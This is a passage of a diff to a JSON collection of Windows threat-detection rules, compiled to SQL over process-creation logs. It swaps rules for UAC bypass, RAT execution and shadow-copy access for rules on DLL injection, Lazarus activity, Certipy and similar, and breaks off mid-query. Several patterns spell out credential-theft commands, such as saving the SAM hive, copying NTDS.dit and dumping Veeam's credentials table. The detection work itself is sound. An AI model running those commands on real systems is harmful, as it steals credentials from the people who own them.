(Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_cmd_stdin_redirect.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", - "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "status": "experimental", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" + "attack.execution" ], "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Windows Admin Share Mount Via Net.EXE", - "id": "3abd6094-7027-475f-9630-8ab9be7b9725", - "status": "test", - "description": "Detects when an admin share is mounted using net.exe", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Administrators" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_admin_share.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Some rare backup scenarios" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Nltest.EXE Execution", - "id": "903076ff-f442-475a-b667-4f246bcc203b", - "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Arun Chauhan", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1018", - "attack.t1482" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration activity" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_nltest_execution.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "status": "test", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.collection", - "attack.t1114" + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "Hiding Files with Attrib.exe", - "id": "4281cb20-2994-4580-aa63-c8b86d019934", - "status": "test", - "description": "Detects usage of attrib.exe to hide files from users.", - "author": "Sami Ruohonen", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "status": "experimental", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_hiding_files.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet", - "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "title": "Use of UltraViewer Remote Access Software", + "id": "88656cec-6c3b-487c-82c0-f73ebb805503", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" + "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Potential Download/Upload Activity Using Type Command", + "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "status": "experimental", + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_lolbin_type.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Driver Install by pnputil.exe", + "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "tags": [ - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.015" + "attack.t1547" ], "falsepositives": [ - "Legitimate use" + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\pnputil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", - "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Product Class Reconnaissance Via Wmic.EXE", + "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", + "status": "experimental", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_wmic_recon_product_class.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' 